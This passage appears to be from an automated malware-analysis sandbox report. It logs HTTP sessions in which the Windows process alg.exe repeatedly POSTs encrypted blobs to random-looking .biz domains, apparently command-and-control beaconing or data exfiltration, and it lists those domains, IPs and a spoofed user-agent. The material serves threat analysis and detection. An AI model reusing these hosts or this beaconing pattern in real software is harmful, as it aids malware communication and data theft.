                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.678443909 CET778OUTData Raw: 1e 6c bc 0d 89 3b 65 13 fe 02 00 00 2a 16 1b 2c e3 ec 3f ad d0 fe f1 c2 1d f0 72 cc 36 db d9 b8 bb cd ba 52 f2 bd 04 1a 33 6c 48 10 ee 19 0e 3a 33 fb 37 de 64 03 70 8e 47 26 60 0e 68 0e 74 b8 c4 eb dc 60 b6 9d 30 73 56 18 27 a5 10 79 3f af 0d 80
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: l;e*,?r6R3lH:37dpG&`ht`0sV'y?Lz@<^sHQDZG{LsI[gX{5'Dx&Tl,Qa,00EDDUv?H4=Zx8G+uwx[%lG36!,mP<
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.354842901 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=2d9b874abce60a431b2f6cbd5bb3d157|155.94.241.187|1731920353|1731920353|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        93192.168.2.105007218.246.231.120807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.271732092 CET353OUTPOST /hiumlgdcypdn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.271754026 CET778OUTData Raw: bf 74 7b a6 50 fd 65 91 fe 02 00 00 2f 4a 4f 4a ce 3d 9d 08 bf 6a c7 6b 67 d1 34 6b 11 9f 84 3d 29 0e 36 7a 9a bd 05 7e 4b 81 78 d5 0f 44 c9 c1 f5 1a 37 dd 49 4b 18 46 be 5d 8e 02 df 54 9b cc 05 69 b1 cf e7 54 20 40 12 c7 c6 d6 61 c3 57 02 5d de
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: t{Pe/JOJ=jkg4k=)6z~KxD7IKF]TiT @aW](a$?-GyZ/-i%J6Vu[&:kJd:*/X`>Xni7vp1tUj m%r$.hGQHj!Q5b.W2pGrzqc
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.101429939 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=70bba89638a9827e1dd9f3cfeb125e04|155.94.241.187|1731920354|1731920354|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        94192.168.2.105007334.211.97.4580
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.569719076 CET352OUTPOST /eppbxqyetuy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.569819927 CET834OUTData Raw: 52 9d c6 1c da d5 f4 54 36 03 00 00 e4 23 a3 13 35 7c 06 52 12 14 bd 57 d1 a4 99 fc ae ce ae 56 5c 86 5f b1 61 38 1f 7f da 5d fb a7 ca 64 8c bf 5b 7a 82 c8 5a c7 1d 9c e2 df 1f f5 2e 0c 59 8e b5 57 46 b4 b9 8f ad 17 8b 58 53 49 c5 e6 0c 9f 72 d1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RT6#5|RWV\_a8]d[zZ.YWFXSIrV7S#:93<5[\/ks(X5%QG_{%vW /pV/>M:3y)Pu@eW^v7&|0\!F^X
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.399615049 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=82d9cd26e115b429234ec4574bfdb1cc|155.94.241.187|1731920355|1731920355|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        95192.168.2.105007454.244.188.17780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.479372025 CET352OUTPOST /dsmegxny HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.479401112 CET834OUTData Raw: ac 1f af b9 1d 5b 95 79 36 03 00 00 93 45 1e 7f 6f 39 03 c2 15 14 8f bc 75 6e 34 dd 83 ea 55 81 62 77 2e 81 51 95 47 36 22 de f8 52 a3 a3 1a ee 9f e6 29 5d aa 52 31 cb 27 28 8a dd 77 9d d7 1f 2e 64 5a a7 2d f6 d2 ac d5 4d ca 22 6e a4 d9 e4 c1 ca
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: [y6Eo9un4Ubw.QG6"R)]R1'(w.dZ-M"n>& VXO9EAfa6mk]A%m%/q5(Z1"uIW)d+@UX <:8m#vP,I(,P2fkWhEo0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.299072027 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=3bfab5e9d2ee28467989a390c564da02|155.94.241.187|1731920356|1731920356|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        96192.168.2.105007544.221.84.105807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.710880041 CET346OUTPOST /yk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.710902929 CET778OUTData Raw: fa 1e 39 c0 54 0e b0 c7 fe 02 00 00 28 39 1c 79 c5 a9 22 f4 64 1b b9 48 e9 d4 38 98 46 b2 a5 a0 c4 aa 33 2a 42 80 6c fa b3 33 75 32 d5 7e 0f 07 b0 fd 88 b5 85 91 96 0c f1 ee 62 79 86 3b 5f 21 9c 49 4f ea 29 11 d5 b2 e9 7c de 87 d6 73 04 0c 8f 21
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 9T(9y"dH8F3*Bl3u2~by;_!IO)|s!k"F<%YJ'(/<+wuo4^2tIq{FgUUL).L&9".lo]^mF*X"7)8K
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.360620022 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a2a6f77d5d17270b661c5ef0dcbc9a2f|155.94.241.187|1731920356|1731920356|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        97192.168.2.105007618.141.10.10780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.318408012 CET349OUTPOST /cpdavm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.318419933 CET834OUTData Raw: a5 0c 22 6b a3 b6 79 a9 36 03 00 00 0d 82 76 ec 70 c3 cc 04 64 df 1e fb 97 1d e7 5b e2 02 f8 09 17 fa 13 e0 9d ba b9 8c e4 49 8e f3 bd 94 93 03 4a 3b 03 8e 48 49 8d 1e b7 f7 5f b6 5f 48 6f eb 93 29 96 23 26 91 40 2e 11 d4 d2 f6 cf 5f d4 cf b7 86
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: "ky6vpd[IJ;HI__Ho)#&@._$2!RsDGj9#:maHOm}Q}>G:RuZ2NDB0DC|vI<V=KY>rggg+c-XG3q<u$!s}{8
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.830176115 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=69002240a2df54eb61b7ce531f59f1fb|155.94.241.187|1731920357|1731920357|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.110455990 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=69002240a2df54eb61b7ce531f59f1fb|155.94.241.187|1731920357|1731920357|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        98192.168.2.105007754.244.188.177807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.736795902 CET350OUTPOST /tjwoaphj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.737037897 CET778OUTData Raw: 9d d7 7a d1 79 28 19 77 fe 02 00 00 49 70 e6 7e 6c 05 b0 7d ca 44 48 71 a9 22 00 e4 e8 45 78 fe 79 9c 02 33 cd cb 56 f2 14 e4 c5 20 3b fb ec 11 28 0e e0 a4 51 b1 15 a6 26 c4 2a 1b c8 42 4f 50 26 0d 5d d8 d8 c7 5b 65 90 e1 1b a1 91 60 98 1c c9 a8
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: zy(wIp~l}DHq"Exy3V ;(Q&*BOP&][e`^?f>%!`"Pq;dQ{_]h:/S5bs5Bd*:.3-0.RELD2rU8_^q7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:17.829994917 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d9dd128066440ce2240c8ff779d718ae|155.94.241.187|1731920357|1731920357|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.110440016 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d9dd128066440ce2240c8ff779d718ae|155.94.241.187|1731920357|1731920357|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        99192.168.2.105007818.208.156.24880
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.131499052 CET343OUTPOST /tq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.131511927 CET834OUTData Raw: c2 9d f9 8f 7c 99 ca 0b 36 03 00 00 3e 44 76 ac 9e 71 14 96 b9 27 a4 5b 16 52 35 77 c5 ca ea 47 6f 09 ab 4d 55 c3 22 75 28 4f b2 83 1f f6 35 2c a4 0f a9 e2 d8 e6 36 1f 46 df ca b8 12 02 45 8c dc a3 4f 21 2a 2b 2d cf 82 aa 49 fb c1 db 49 6a ba 15
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: |6>Dvq'[R5wGoMU"u(O5,6FEO!*+-IIj5Q(FG~<!"]#D"Rs#wRd46.zi^bVoO/Ve>R4[rRM<1R|Az:(W8W(_eg9mQ<YVN
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.799309969 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=f99d3400413ec402deefa4f7e811a215|155.94.241.187|1731920358|1731920358|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        100192.168.2.10500793.254.94.185807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.317615032 CET346OUTPOST /nkklk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.317697048 CET778OUTData Raw: 0a 17 b5 75 97 7f 92 ea fe 02 00 00 a4 e8 9b 53 74 b8 bb d3 c9 8c 95 bd 09 01 de a1 4f 33 fd b7 50 09 b7 48 f8 e8 c9 f9 fc 43 1d 28 ad 05 7b 9a d5 09 80 d5 3a 29 c1 88 1e e7 51 af 52 ef f1 fd 5d 1b d9 4f 82 df 9f 6a a8 ff a1 9e 88 a8 20 83 fb 88
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: uStO3PHC({:)QR]Oj {,L#\pZfP%KB)CP%3yOzR4jToW,9A"T)?xM[+L;eJ>pa9V{7iZt.mLmN`s'Y
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.299871922 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=362bf28174c7542b1a550ed47a47d496|155.94.241.187|1731920359|1731920359|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        101192.168.2.105008044.221.84.10580
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.033890009 CET356OUTPOST /tynixdppnmlq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
